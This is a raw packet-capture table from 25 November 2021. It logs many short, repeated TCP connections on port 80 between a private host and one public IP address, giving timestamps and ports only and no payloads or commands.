Nov 25, 2021 10:49:09.051691055 CET	80	49954	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.051914930 CET	49954	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.053477049 CET	49954	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.087382078 CET	80	49954	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.087551117 CET	49954	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.121385098 CET	80	49954	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.137372971 CET	80	49954	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.137401104 CET	80	49954	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.137571096 CET	49954	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.137603998 CET	49954	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.171593904 CET	80	49954	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.548882961 CET	49955	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.582165956 CET	80	49955	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.582411051 CET	49955	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.583941936 CET	49955	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.617016077 CET	80	49955	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.617199898 CET	49955	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.650391102 CET	80	49955	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.682661057 CET	80	49955	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.682720900 CET	80	49955	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.683008909 CET	49955	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.683104992 CET	49955	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:09.716552973 CET	80	49955	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.073545933 CET	49956	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.107729912 CET	80	49956	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.107889891 CET	49956	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.109386921 CET	49956	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.143414974 CET	80	49956	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.143734932 CET	49956	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.177793026 CET	80	49956	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.206259012 CET	80	49956	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.206307888 CET	80	49956	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.206489086 CET	49956	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.206537008 CET	49956	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.240783930 CET	80	49956	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.617584944 CET	49957	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.651084900 CET	80	49957	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.651355982 CET	49957	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.657392025 CET	49957	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.690771103 CET	80	49957	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.691003084 CET	49957	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.724347115 CET	80	49957	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.739757061 CET	80	49957	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.739829063 CET	80	49957	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:10.740154982 CET	49957	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.740214109 CET	49957	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:10.773627043 CET	80	49957	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.145220041 CET	49958	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.178777933 CET	80	49958	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.179073095 CET	49958	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.180607080 CET	49958	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.213918924 CET	80	49958	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.214133978 CET	49958	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.247586012 CET	80	49958	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.266808033 CET	80	49958	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.266881943 CET	80	49958	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.267031908 CET	49958	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.267086029 CET	49958	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.300395966 CET	80	49958	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.608238935 CET	49959	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.642133951 CET	80	49959	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.642326117 CET	49959	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.643884897 CET	49959	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.677735090 CET	80	49959	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.677861929 CET	49959	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.711730957 CET	80	49959	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.727848053 CET	80	49959	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.727874041 CET	80	49959	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:11.728008032 CET	49959	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.728030920 CET	49959	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:11.761965036 CET	80	49959	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.049063921 CET	49960	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.082190990 CET	80	49960	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.082422972 CET	49960	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.083952904 CET	49960	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.117125988 CET	80	49960	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.117309093 CET	49960	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.150620937 CET	80	49960	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.177886963 CET	80	49960	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.177934885 CET	80	49960	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.178148031 CET	49960	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.178200960 CET	49960	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.211452961 CET	80	49960	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.525746107 CET	49961	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.559137106 CET	80	49961	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.559329033 CET	49961	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.560857058 CET	49961	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.594208002 CET	80	49961	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.594418049 CET	49961	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.627768040 CET	80	49961	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.649662971 CET	80	49961	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.649719000 CET	80	49961	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:12.649990082 CET	49961	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.650074005 CET	49961	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:12.683592081 CET	80	49961	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.057607889 CET	49962	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.091131926 CET	80	49962	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.091393948 CET	49962	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.092994928 CET	49962	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.126420021 CET	80	49962	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.126624107 CET	49962	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.160242081 CET	80	49962	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.183248043 CET	80	49962	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.183301926 CET	80	49962	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.183578014 CET	49962	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.183693886 CET	49962	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.217500925 CET	80	49962	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.586759090 CET	49964	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.620703936 CET	80	49964	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.620882034 CET	49964	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.622407913 CET	49964	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.656394005 CET	80	49964	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.656611919 CET	49964	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.690660954 CET	80	49964	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.706809998 CET	80	49964	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.706860065 CET	80	49964	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:13.707001925 CET	49964	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.707048893 CET	49964	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:13.741259098 CET	80	49964	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.102238894 CET	49965	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.135597944 CET	80	49965	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.135828018 CET	49965	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.137401104 CET	49965	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.170733929 CET	80	49965	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.171044111 CET	49965	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.204336882 CET	80	49965	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.220704079 CET	80	49965	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.220752954 CET	80	49965	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.220912933 CET	49965	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.220962048 CET	49965	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.254509926 CET	80	49965	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.635392904 CET	49966	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.669549942 CET	80	49966	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.669806004 CET	49966	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.671375036 CET	49966	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.705465078 CET	80	49966	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.705666065 CET	49966	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.739526987 CET	80	49966	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.756098986 CET	80	49966	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.756205082 CET	80	49966	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:14.756359100 CET	49966	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.756387949 CET	49966	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:14.790163040 CET	80	49966	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.116560936 CET	49967	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.149678946 CET	80	49967	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.150021076 CET	49967	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.151566982 CET	49967	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.184871912 CET	80	49967	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.185141087 CET	49967	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.218445063 CET	80	49967	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.234466076 CET	80	49967	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.234513998 CET	80	49967	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.234649897 CET	49967	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.234709978 CET	49967	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.268115997 CET	80	49967	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.632874966 CET	49968	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.667036057 CET	80	49968	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.667366982 CET	49968	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.668863058 CET	49968	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.702827930 CET	80	49968	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.703031063 CET	49968	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.737318993 CET	80	49968	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.753048897 CET	80	49968	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.753103971 CET	80	49968	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:15.753279924 CET	49968	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.753362894 CET	49968	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:15.787669897 CET	80	49968	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.149313927 CET	49969	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.182784081 CET	80	49969	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.182986975 CET	49969	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.184501886 CET	49969	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.217844009 CET	80	49969	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.218053102 CET	49969	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.251575947 CET	80	49969	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.281188965 CET	80	49969	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.281244040 CET	80	49969	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.281521082 CET	49969	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.281620026 CET	49969	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.315187931 CET	80	49969	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.684794903 CET	49970	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.718923092 CET	80	49970	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.719191074 CET	49970	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.721052885 CET	49970	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.755120993 CET	80	49970	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.755250931 CET	49970	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.789266109 CET	80	49970	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.805708885 CET	80	49970	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.805769920 CET	80	49970	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:16.805907011 CET	49970	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.805965900 CET	49970	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:16.840001106 CET	80	49970	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.178350925 CET	49971	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.211846113 CET	80	49971	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.212063074 CET	49971	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.213581085 CET	49971	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.247020960 CET	80	49971	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.247226954 CET	49971	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.280733109 CET	80	49971	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.299865961 CET	80	49971	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.299956083 CET	80	49971	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.300244093 CET	49971	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.300339937 CET	49971	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.333977938 CET	80	49971	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.681849957 CET	49972	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.715049982 CET	80	49972	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.715359926 CET	49972	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.716881037 CET	49972	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.750022888 CET	80	49972	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.750284910 CET	49972	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.783457041 CET	80	49972	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.799886942 CET	80	49972	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.799957037 CET	80	49972	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:17.800108910 CET	49972	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.800162077 CET	49972	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:17.833556890 CET	80	49972	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.150871038 CET	49973	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.184619904 CET	80	49973	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.184959888 CET	49973	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.186520100 CET	49973	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.220325947 CET	80	49973	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.220494032 CET	49973	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.254503012 CET	80	49973	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.273413897 CET	80	49973	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.273488045 CET	80	49973	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.273772955 CET	49973	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.273869991 CET	49973	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.307971001 CET	80	49973	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.660604954 CET	49974	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.694175005 CET	80	49974	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.694420099 CET	49974	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.695895910 CET	49974	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.729233027 CET	80	49974	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.729501009 CET	49974	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.762835979 CET	80	49974	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.781258106 CET	80	49974	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.781306982 CET	80	49974	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:18.781475067 CET	49974	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.781522989 CET	49974	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:18.814915895 CET	80	49974	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.172818899 CET	49975	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.206903934 CET	80	49975	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.207115889 CET	49975	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.208676100 CET	49975	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.242662907 CET	80	49975	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.242902994 CET	49975	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.276997089 CET	80	49975	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.300923109 CET	80	49975	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.300971985 CET	80	49975	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.301114082 CET	49975	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.301167011 CET	49975	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.335228920 CET	80	49975	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.699063063 CET	49976	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.732466936 CET	80	49976	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.732701063 CET	49976	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.734179974 CET	49976	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.767642975 CET	80	49976	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.767852068 CET	49976	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.801197052 CET	80	49976	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.816936970 CET	80	49976	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.817003012 CET	80	49976	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:19.817457914 CET	49976	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.817516088 CET	49976	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:19.850970984 CET	80	49976	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.195010900 CET	49977	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.229228020 CET	80	49977	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.229460001 CET	49977	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.231014013 CET	49977	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.265204906 CET	80	49977	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.265523911 CET	49977	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.299832106 CET	80	49977	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.316693068 CET	80	49977	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.316756964 CET	80	49977	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.317050934 CET	49977	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.317147970 CET	49977	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.351475000 CET	80	49977	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.659228086 CET	49978	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.693301916 CET	80	49978	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.693538904 CET	49978	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.695065975 CET	49978	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.729075909 CET	80	49978	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.729275942 CET	49978	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.763313055 CET	80	49978	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.786034107 CET	80	49978	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.786083937 CET	80	49978	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:20.786309958 CET	49978	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.786367893 CET	49978	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:20.820285082 CET	80	49978	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.169198990 CET	49979	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.202600956 CET	80	49979	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.202768087 CET	49979	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.204317093 CET	49979	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.237688065 CET	80	49979	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.237867117 CET	49979	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.271294117 CET	80	49979	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.291951895 CET	80	49979	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.292005062 CET	80	49979	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.292148113 CET	49979	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.292200089 CET	49979	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.325895071 CET	80	49979	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.690028906 CET	49980	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.723447084 CET	80	49980	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.723742962 CET	49980	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.725256920 CET	49980	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.758635998 CET	80	49980	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.758807898 CET	49980	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.792176962 CET	80	49980	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.808264971 CET	80	49980	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.808314085 CET	80	49980	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:21.808466911 CET	49980	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.808516026 CET	49980	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:21.841921091 CET	80	49980	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.125397921 CET	49981	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.159272909 CET	80	49981	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.159491062 CET	49981	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.161051035 CET	49981	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.194948912 CET	80	49981	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.195099115 CET	49981	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.228984118 CET	80	49981	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.245876074 CET	80	49981	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.245898962 CET	80	49981	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.246067047 CET	49981	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.246089935 CET	49981	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.279988050 CET	80	49981	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.658746004 CET	49982	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.692166090 CET	80	49982	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.692409039 CET	49982	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.694083929 CET	49982	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.727385998 CET	80	49982	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.727617025 CET	49982	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.760967016 CET	80	49982	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.777534008 CET	80	49982	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.777585983 CET	80	49982	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:22.777796030 CET	49982	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.777847052 CET	49982	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:22.811518908 CET	80	49982	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.200949907 CET	49983	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.235073090 CET	80	49983	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:23.235321045 CET	49983	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.236989975 CET	49983	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:23.270956039 CET	80	49983	176.223.209.128	192.168.11.20
